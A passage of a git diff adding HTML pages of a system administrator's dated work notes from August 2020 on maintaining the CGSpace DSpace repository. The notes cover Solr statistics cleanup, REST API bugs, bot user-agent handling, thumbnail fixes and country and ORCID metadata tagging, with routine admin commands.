+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2020-08/index.html b/docs/2020-08/index.html
new file mode 100644
index 000000000..6d29a47ec
--- /dev/null
+++ b/docs/2020-08/index.html
@@ -0,0 +1,852 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="August, 2020" />
+<meta property="og:description" content="2020-08-02
+
+I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their cg.coverage.country text values
+
+It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter&rsquo;s preferred &ldquo;display&rdquo; country names)
+It implements a &ldquo;force&rdquo; mode too that will clear existing country codes and re-tag everything
+It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa&hellip;
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-08/" />
+<meta property="article:published_time" content="2020-08-02T15:35:54+03:00" />
+<meta property="article:modified_time" content="2020-09-02T13:39:11+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="August, 2020"/>
+<meta name="twitter:description" content="2020-08-02
+
+I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their cg.coverage.country text values
+
+It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter&rsquo;s preferred &ldquo;display&rdquo; country names)
+It implements a &ldquo;force&rdquo; mode too that will clear existing country codes and re-tag everything
+It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa&hellip;
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "August, 2020",
+  "url": "https://alanorth.github.io/cgspace-notes/2020-08/",
+  "wordCount": "3672",
+  "datePublished": "2020-08-02T15:35:54+03:00",
+  "dateModified": "2020-09-02T13:39:11+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2020-08/">
+
+    <title>August, 2020 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-08/">August, 2020</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2020-08-02T15:35:54+03:00">Sun Aug 02, 2020</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-08-02">2020-08-02</h2>
+<ul>
+<li>I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their <code>cg.coverage.country</code> text values
+<ul>
+<li>It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter&rsquo;s preferred &ldquo;display&rdquo; country names)</li>
+<li>It implements a &ldquo;force&rdquo; mode too that will clear existing country codes and re-tag everything</li>
+<li>It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa&hellip;</li>
+</ul>
+</li>
+</ul>
+<ul>
+<li>The code is currently on my personal GitHub: <a href="https://github.com/alanorth/dspace-curation-tasks">https://github.com/alanorth/dspace-curation-tasks</a>
+<ul>
+<li>I still need to figure out how to integrate this with the DSpace build because currently you have to package it and copy the JAR to the <code>dspace/lib</code> directory (not to mention the config)</li>
+</ul>
+</li>
+<li>I forked the <a href="https://github.com/ilri/dspace-curation-tasks">dspace-curation-tasks to ILRI&rsquo;s GitHub</a> and <a href="https://issues.sonatype.org/browse/OSSRH-59650">submitted the project to Maven Central</a> so I can integrate it more easily with our DSpace build via dependencies</li>
+</ul>
+<h2 id="2020-08-03">2020-08-03</h2>
+<ul>
+<li>Atmire responded to the ticket about the ongoing upgrade issues
+<ul>
+<li>They pushed an RC2 version of the CUA module that fixes the FontAwesome issue so that they now use classes instead of Unicode hex characters so our JS + SVG works!</li>
+<li>They also said they have never experienced the <code>type: 5</code> site statistics issue, so I need to try to purge those and continue with the stats processing</li>
+</ul>
+</li>
+<li>I purged all unmigrated stats in a few cores and then restarted processing:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;&#39;
+$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
+$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics
+</code></pre><ul>
+<li>Andrea from Macaroni Bros emailed me a few days ago to say he&rsquo;s having issues with the CGSpace REST API
+<ul>
+<li>He said he noticed the issues when they were developing the WordPress plugin to harvest CGSpace for the RTB website: <a href="https://www.rtb.cgiar.org/publications/">https://www.rtb.cgiar.org/publications/</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-08-04">2020-08-04</h2>
+<ul>
+<li>Look into the REST API issues that Macaroni Bros raised last week:
+<ul>
+<li>The first one was about the <code>collections</code> endpoint returning empty items:
+<ul>
+<li><a href="https://cgspace.cgiar.org/rest/collections/1445/items?limit=1&amp;offset=2">https://cgspace.cgiar.org/rest/collections/1445/items?limit=1&amp;offset=2</a> (offset=2 is correct)</li>
+<li><a href="https://cgspace.cgiar.org/rest/collections/1445/items?limit=1&amp;offset=3">https://cgspace.cgiar.org/rest/collections/1445/items?limit=1&amp;offset=3</a> (offset=3 is empty)</li>
+<li><a href="https://cgspace.cgiar.org/rest/collections/1445/items?limit=1&amp;offset=4">https://cgspace.cgiar.org/rest/collections/1445/items?limit=1&amp;offset=4</a> (offset=4 is correct again)</li>
+</ul>
+</li>
+<li>I confirm that the second link returns zero items on CGSpace&hellip;
+<ul>
+<li>I tested on my local development instance and it returns one item correctly&hellip;</li>
+<li>I tested on DSpace Test (currently DSpace 6 with UUIDs) and it returns one item correctly&hellip;</li>
+<li>Perhaps an indexing issue?</li>
+</ul>
+</li>
+<li>The second issue is the <code>collections</code> endpoint returning the wrong number of items:
+<ul>
+<li><a href="https://cgspace.cgiar.org/rest/collections/1445">https://cgspace.cgiar.org/rest/collections/1445</a> (numberItems: 63)</li>
+<li><a href="https://cgspace.cgiar.org/rest/collections/1445/items">https://cgspace.cgiar.org/rest/collections/1445/items</a> (real number of items: 61)</li>
+</ul>
+</li>
+<li>I confirm that it is indeed happening on CGSpace&hellip;
+<ul>
+<li>And actually I can replicate the same issue on my local CGSpace 5.8 instance:</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;http://localhost:8080/rest/collections/1445&#39; | json_pp | grep numberItems
+   &#34;numberItems&#34; : 63,
+$ http &#39;http://localhost:8080/rest/collections/1445/items&#39; jq &#39;. | length&#39;
+61
+</code></pre><ul>
+<li>Also on DSpace Test (which is running DSpace 6!), though the issue is slightly different there:</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708&#39; | json_pp | grep numberItems
+   &#34;numberItems&#34; : 61,
+$ http &#39;https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708/items&#39; | jq &#39;. | length&#39;
+59
+</code></pre><ul>
+<li>Ah! I exported that collection&rsquo;s metadata and checked it in OpenRefine, where I noticed that two items are mapped twice
+<ul>
+<li>I dealt with this problem in 2017-01 and the solution is to check the <code>collection2item</code> table:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT * FROM collection2item WHERE item_id = &#39;107687&#39;;
+   id   | collection_id | item_id
+--------+---------------+---------
+ 133698 |           966 |  107687
+ 134685 |          1445 |  107687
+ 134686 |          1445 |  107687
+(3 rows)
+</code></pre><ul>
+<li>So for each id you can delete one duplicate mapping:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# DELETE FROM collection2item WHERE id=&#39;134686&#39;;
+dspace=# DELETE FROM collection2item WHERE id=&#39;128819&#39;;
+</code></pre><ul>
+<li>Update countries on CGSpace to be closer to ISO 3166-1 with some minor differences based on Peter&rsquo;s preferred display names</li>
+</ul>
+<pre tabindex="0"><code>$ cat 2020-08-04-PB-new-countries.csv
+cg.coverage.country,correct
+CAPE VERDE,CABO VERDE
+COCOS ISLANDS,COCOS (KEELING) ISLANDS
+&#34;CONGO, DR&#34;,&#34;CONGO, DEMOCRATIC REPUBLIC OF&#34;
+COTE D&#39;IVOIRE,CÔTE D&#39;IVOIRE
+&#34;KOREA, REPUBLIC&#34;,&#34;KOREA, REPUBLIC OF&#34;
+PALESTINE,&#34;PALESTINE, STATE OF&#34;
+$ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -t &#39;correct&#39; -m 228
+</code></pre><ul>
+<li>I had to restart Tomcat 7 three times before all the Solr statistics cores came up properly
+<ul>
+<li>I started a full Discovery re-indexing</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-08-05">2020-08-05</h2>
+<ul>
+<li>Port my <a href="https://github.com/ilri/dspace-curation-tasks">dspace-curation-tasks</a> to DSpace 6 and tag version <code>6.0-SNAPSHOT</code></li>
+<li>I downloaded the <a href="https://unstats.un.org/unsd/methodology/m49/overview/">UN M.49</a> CSV file to start working on updating the CGSpace regions
+<ul>
+<li>First issue is they don&rsquo;t version the file so you have no idea when it was released</li>
+<li>Second issue is that three rows have errors due to not using quotes around &ldquo;China, Macao Special Administrative Region&rdquo;</li>
+</ul>
+</li>
+<li>Bizu said she was having problems approving tasks on CGSpace
+<ul>
+<li>I looked at the PostgreSQL locks and they have skyrocketed since yesterday:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/08/postgres_locks_ALL-day.png" alt="PostgreSQL locks day"></p>
+<p><img src="/cgspace-notes/2020/08/postgres_querylength_ALL-day.png" alt="PostgreSQL query length day"></p>
+<ul>
+<li>Seems that something happened yesterday afternoon at around 5PM&hellip;
+<ul>
+<li>For now I will just run all updates on the server and reboot it, as I have no idea what causes this issue</li>
+<li>I had to restart Tomcat 7 three times after the server came back up before all Solr statistics cores came up properly</li>
+</ul>
+</li>
+<li>I checked the nginx logs around 5PM yesterday to see who was accessing the server:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#39;04/Aug/2020:(17|18)&#39; | goaccess --log-format=COMBINED -
+</code></pre><ul>
+<li>I see the Macaroni Bros are using their new user agent for harvesting: <code>RTB website BOT</code>
+<ul>
+<li>But that pattern doesn&rsquo;t match in the nginx bot list or Tomcat&rsquo;s crawler session manager valve because we&rsquo;re only checking for <code>[Bb]ot</code>!</li>
+<li>So they have created thousands of Tomcat sessions:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep -E &#34;(63.32.242.35|64.62.202.71)&#34; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+5693
+</code></pre><ul>
+<li>DSpace itself uses a case-sensitive regex for user agents so there are no hits from those IPs in Solr, but I need to tweak the other regexes so they don&rsquo;t misuse the resources
+<ul>
+<li>Perhaps <code>[Bb][Oo][Tt]</code>&hellip;</li>
+</ul>
+</li>
+<li>I see another IP 104.198.96.245, which is also using the &ldquo;RTB website BOT&rdquo; but there are 70,000 hits in Solr from earlier this year before they started using the user agent
+<ul>
+<li>I purged all the hits from Solr, including a few thousand from 64.62.202.71</li>
+</ul>
+</li>
+<li>A few more IPs causing lots of Tomcat sessions yesterday:</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep &#34;38.128.66.10&#34; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+1585
+$ cat dspace.log.2020-08-04 | grep &#34;64.62.202.71&#34; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+5691
+</code></pre><ul>
+<li>38.128.66.10 isn&rsquo;t creating any Solr statistics due to our DSpace agents pattern, but they are creating lots of sessions so perhaps I need to force them to use one session in Tomcat:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 5.1) brokenlinkcheck.com/1.2
+</code></pre><ul>
+<li>64.62.202.71 is using a user agent I&rsquo;ve never seen before:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (compatible; +centuryb.o.t9[at]gmail.com)
+</code></pre><ul>
+<li>So now our &ldquo;bot&rdquo; regex can&rsquo;t even match that&hellip;
+<ul>
+<li>Unless we change it to <code>[Bb]\.?[Oo]\.?[Tt]\.?</code>&hellip; which seems to match all variations of &ldquo;bot&rdquo; I can think of right now, according to <a href="https://regexr.com/59lpt">regexr.com</a>:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>RTB website BOT
+Altmetribot
+Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
+Mozilla/5.0 (compatible; +centuryb.o.t9[at]gmail.com)
+Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)
+</code></pre><ul>
+<li>And another IP belonging to Turnitin (the alternate user agent of Turnitinbot):</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep &#34;199.47.87.145&#34; | grep -E &#39;sessi
+on_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+2777
+</code></pre><ul>
+<li>I will add <code>Turnitin</code> to the Tomcat Crawler Session Manager Valve regex as well&hellip;</li>
+</ul>
+<h2 id="2020-08-06">2020-08-06</h2>
+<ul>
+<li>I have been working on processing the Solr statistics with the Atmire tool on DSpace Test the last few days:
+<ul>
+<li>statistics:
+<ul>
+<li>2,040,385 docs: 2h 28m 49s</li>
+</ul>
+</li>
+<li>statistics-2019:
+<ul>
+<li>8,960,000 docs: 12h 7s</li>
+<li>1,780,575 docs: 2h 7m 29s</li>
+</ul>
+</li>
+<li>statistics-2018:
+<ul>
+<li>1,970,000 docs: 12h 1m 28s</li>
+<li>360,000 docs: 2h 54m 56s (Linode rebooted)</li>
+<li>1,110,000 docs: 7h 1m 44s (Restarted Tomcat, oops)</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>I decided to start the 2018 core over again, so I re-synced it from CGSpace and started again from the solr-upgrade-statistics-6x tool and now I&rsquo;m having the same issues with Java heap space that I had last month
+<ul>
+<li>The process kept crashing due to memory, so I increased the memory to 3072m and finally 4096m&hellip;</li>
+<li>Also, I decided to try to purge all the <code>-unmigrated</code> docs that it had found so far to see if that helps&hellip;</li>
+<li>There were about 466,000 records unmigrated so far, most of which were <code>type: 5</code> (SITE statistics)</li>
+<li>Now it is processing again&hellip;</li>
+</ul>
+</li>
+<li>I developed a small Java class called <code>FixJpgJpgThumbnails</code> to remove &ldquo;.jpg.jpg&rdquo; thumbnails from the <code>THUMBNAIL</code> bundle and replace them with their originals from the <code>ORIGINAL</code> bundle
+<ul>
+<li>The code is based on <a href="https://github.com/UoW-IRRs/DSpace-Scripts/blob/master/src/main/java/nz/ac/waikato/its/irr/scripts/RemovePNGThumbnailsForPDFs.java">RemovePNGThumbnailsForPDFs.java</a> by Andrea Schweer</li>
+<li>I incorporated it into my dspace-curation-tasks repository, then renamed it to <a href="https://github.com/ilri/cgspace-java-helpers">cgspace-java-helpers</a></li>
+<li>In testing I found that I can replace ~4,000 thumbnails on CGSpace!</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-08-07">2020-08-07</h2>
+<ul>
+<li>I improved the <code>RemovePNGThumbnailsForPDFs.java</code> a bit more to exclude infographics and original bitstreams larger than 100KiB
+<ul>
+<li>I ran it on CGSpace and it cleaned up 3,769 thumbnails!</li>
+<li>Afterwards I ran <code>dspace cleanup -v</code> to remove the deleted thumbnails</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-08-08">2020-08-08</h2>
+<ul>
+<li>The Atmire stats processing for the statistics-2018 Solr core keeps stopping with this error:</li>
+</ul>
+<pre tabindex="0"><code>Exception: 50 consecutive records couldn&#39;t be saved. There&#39;s most likely an issue with the connection to the solr server. Shutting down.
+java.lang.RuntimeException: 50 consecutive records couldn&#39;t be saved. There&#39;s most likely an issue with the connection to the solr server. Shutting down.
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.storeOnServer(SourceFile:317)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:177)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:161)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</code></pre><ul>
+<li>It lists a few of the records that it is having issues with and they all have integer IDs
+<ul>
+<li>When I checked Solr I see 8,000 of them, some of which have type 0 and some with no type&hellip;</li>
+<li>I purged them and then the process continues:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/[0-9]+/&lt;/query&gt;&lt;/delete&gt;&#39;
+</code></pre><h2 id="2020-08-09">2020-08-09</h2>
+<ul>
+<li>The Atmire script did something to the server and created 132GB of log files so the root partition ran out of space&hellip;</li>
+<li>I removed the log file and tried to re-run the process but it seems to be looping over 11,000 records and failing, creating millions of lines in the logs again:</li>
+</ul>
+<pre tabindex="0"><code># grep -oE &#34;Record uid: ([a-f0-9\\-]*){1} couldn&#39;t be processed&#34; /home/dspacetest.cgiar.org/log/dspace.log.2020-08-09 &gt; /tmp/not-processed-errors.txt
+# wc -l /tmp/not-processed-errors.txt
+2202973 /tmp/not-processed-errors.txt
+# sort /tmp/not-processed-errors.txt | uniq -c | tail -n 10
+    220 Record uid: ffe52878-ba23-44fb-8df7-a261bb358abc couldn&#39;t be processed
+    220 Record uid: ffecb2b0-944d-4629-afdf-5ad995facaf9 couldn&#39;t be processed
+    220 Record uid: ffedde6b-0782-4d9f-93ff-d1ba1a737585 couldn&#39;t be processed
+    220 Record uid: ffedfb13-e929-4909-b600-a18295520a97 couldn&#39;t be processed
+    220 Record uid: fff116fb-a1a0-40d0-b0fb-b71e9bb898e5 couldn&#39;t be processed
+    221 Record uid: fff1349d-79d5-4ceb-89a1-ce78107d982d couldn&#39;t be processed
+    220 Record uid: fff13ddb-b2a2-410a-9baa-97e333118c74 couldn&#39;t be processed
+    220 Record uid: fff232a6-a008-47d0-ad83-6e209bb6cdf9 couldn&#39;t be processed
+    221 Record uid: fff75243-c3be-48a0-98f8-a656f925cb68 couldn&#39;t be processed
+    221 Record uid: fff88af8-88d4-4f79-ba1a-79853973c872 couldn&#39;t be processed
+</code></pre><ul>
+<li>I looked at some of those records and saw strange objects in their <code>containerCommunity</code>, <code>containerCollection</code>, etc&hellip;</li>
+</ul>
+<pre tabindex="0"><code>{
+  &#34;responseHeader&#34;: {
+    &#34;status&#34;: 0,
+    &#34;QTime&#34;: 0,
+    &#34;params&#34;: {
+      &#34;q&#34;: &#34;uid:fff1349d-79d5-4ceb-89a1-ce78107d982d&#34;,
+      &#34;indent&#34;: &#34;true&#34;,
+      &#34;wt&#34;: &#34;json&#34;,
+      &#34;_&#34;: &#34;1596957629970&#34;
+    }
+  },
+  &#34;response&#34;: {
+    &#34;numFound&#34;: 1,
+    &#34;start&#34;: 0,
+    &#34;docs&#34;: [
+      {
+        &#34;containerCommunity&#34;: [
+          &#34;155&#34;,
+          &#34;155&#34;,
+          &#34;{set=null}&#34;
+        ],
+        &#34;uid&#34;: &#34;fff1349d-79d5-4ceb-89a1-ce78107d982d&#34;,
+        &#34;containerCollection&#34;: [
+          &#34;1099&#34;,
+          &#34;830&#34;,
+          &#34;{set=830}&#34;
+        ],
+        &#34;owningComm&#34;: [
+          &#34;155&#34;,
+          &#34;155&#34;,
+          &#34;{set=null}&#34;
+        ],
+        &#34;isInternal&#34;: false,
+        &#34;isBot&#34;: false,
+        &#34;statistics_type&#34;: &#34;view&#34;,
+        &#34;time&#34;: &#34;2018-05-08T23:17:00.157Z&#34;,
+        &#34;owningColl&#34;: [
+          &#34;1099&#34;,
+          &#34;830&#34;,
+          &#34;{set=830}&#34;
+        ],
+        &#34;_version_&#34;: 1621500445042147300
+      }
+    ]
+  }
+}
+</code></pre><ul>
+<li>I deleted those 11,724 records with the strange &ldquo;set&rdquo; object in the collections and communities, as well as 360,000 records with <code>id: -1</code></li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;&#39;
+$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:\-1&lt;/query&gt;&lt;/delete&gt;&#39;
+</code></pre><ul>
+<li>I was going to compare the CUA stats for 2018 and 2019 on CGSpace and DSpace Test, but after Linode rebooted CGSpace (linode18) for maintenance yesterday the solr cores didn&rsquo;t all come back up OK
+<ul>
+<li>I had to restart Tomcat five times before they all came up!</li>
+<li>After that I generated a report for 2018 and 2019 on each server and found that the difference is about 10,000–20,000 per month, which is much less than I was expecting</li>
+</ul>
+</li>
+<li>I noticed some authors that should have ORCID identifiers, but didn&rsquo;t (perhaps older items before we were tagging ORCID metadata)
+<ul>
+<li>With the simple list below I added 1,341 identifiers!</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ cat 2020-08-09-add-ILRI-orcids.csv
+dc.contributor.author,cg.creator.id
+&#34;Grace, Delia&#34;,&#34;Delia Grace: 0000-0002-0195-9489&#34;
+&#34;Delia Grace&#34;,&#34;Delia Grace: 0000-0002-0195-9489&#34;
+&#34;Baker, Derek&#34;,&#34;Derek Baker: 0000-0001-6020-6973&#34;
+&#34;Ngan Tran Thi&#34;,&#34;Tran Thi Ngan: 0000-0002-7184-3086&#34;
+&#34;Dang Xuan Sinh&#34;,&#34;Sinh Dang-Xuan: 0000-0002-0522-7808&#34;
+&#34;Hung Nguyen-Viet&#34;,&#34;Hung Nguyen-Viet: 0000-0001-9877-0596&#34;
+&#34;Pham Van Hung&#34;,&#34;Pham Anh Hung: 0000-0001-9366-0259&#34;
+&#34;Lindahl, Johanna F.&#34;,&#34;Johanna Lindahl: 0000-0002-1175-0398&#34;
+&#34;Teufel, Nils&#34;,&#34;Nils Teufel: 0000-0001-5305-6620&#34;
+&#34;Duncan, Alan J.&#34;,Alan Duncan: 0000-0002-3954-3067&#34;
+&#34;Moodley, Arshnee&#34;,&#34;Arshnee Moodley: 0000-0002-6469-3948&#34;
+</code></pre><ul>
+<li>That got me curious, so I generated a list of all the unique ORCID identifiers we have in the database:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240) TO /tmp/2020-08-09-orcid-identifiers.csv;
+COPY 2095
+dspace=# \q
+$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; /tmp/2020-08-09-orcid-identifiers.csv | sort | uniq &gt; /tmp/2020-08-09-orcid-identifiers-uniq.csv
+$ wc -l /tmp/2020-08-09-orcid-identifiers-uniq.csv
+1949 /tmp/2020-08-09-orcid-identifiers-uniq.csv
+</code></pre><ul>
+<li>I looked into the strange Solr record above that had &ldquo;{set=830}&rdquo; in the communities and collections
+<ul>
+<li>There are exactly 11724 records like this in the current CGSpace (DSpace 5.8) statistics-2018 Solr core</li>
+<li>None of them have an <code>id</code> or <code>type</code> field!</li>
+<li>I see 242,000 of them in the statistics-2017 core, 185,063 in the statistics-2016 core&hellip; all the way to 2010, but not in 2019 or the current statistics core</li>
+<li>I decided to purge all of these records from CGSpace right now so they don&rsquo;t even have a chance at being an issue on the real migration:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;&#39;
+...
+$ curl -s &#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;&#39;
+</code></pre><ul>
+<li>I added <code>Googlebot</code> and <code>Twitterbot</code> to the list of explicitly allowed bots
+<ul>
+<li>In Google&rsquo;s case, they were getting lumped in with all the other bad bots and then important links like the sitemaps were returning HTTP 503, but they generally respect <code>robots.txt</code> so we should just allow them (perhaps we can control the crawl rate in the webmaster console)</li>
+<li>In Twitter&rsquo;s case they were also getting lumped in with the bad bots too, but really they only make ~50 or so requests a day when someone posts a CGSpace link on Twitter</li>
+</ul>
+</li>
+<li>I tagged the ISO 3166-1 Alpha2 country codes on all items on CGSpace using my <a href="https://github.com/ilri/cgspace-java-helpers">CountryCodeTagger</a> curation task
+<ul>
+<li>I still need to set up a cron job for it&hellip;</li>
+<li>This tagged 50,000 countries!</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT count(text_value) FROM metadatavalue WHERE metadata_field_id = 243 AND resource_type_id = 2;
+ count
+-------
+ 50812
+(1 row)
+</code></pre><h2 id="2020-08-11">2020-08-11</h2>
+<ul>
+<li>I noticed some more hits from Macaroni&rsquo;s WordPress harvestor that I hadn&rsquo;t caught last week
+<ul>
+<li>104.198.13.34 made many requests without a user agent, with a &ldquo;WordPress&rdquo; user agent, and with their new &ldquo;RTB website BOT&rdquo; user agent, about 100,000 in total in 2020, and maybe another 70,000 in the other years</li>
+<li>I will purge them an add them to the Tomcat Crawler Session Manager and the DSpace bots list so they don&rsquo;t get logged in Solr</li>
+</ul>
+</li>
+<li>I noticed a bunch of user agents with &ldquo;Crawl&rdquo; in the Solr stats, which is strange because the DSpace spider agents file has had &ldquo;crawl&rdquo; for a long time (and it is case insensitive)
+<ul>
+<li>In any case I will purge them and add them to the Tomcat Crawler Session Manager Valve so that at least their sessions get re-used</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-08-13">2020-08-13</h2>
+<ul>
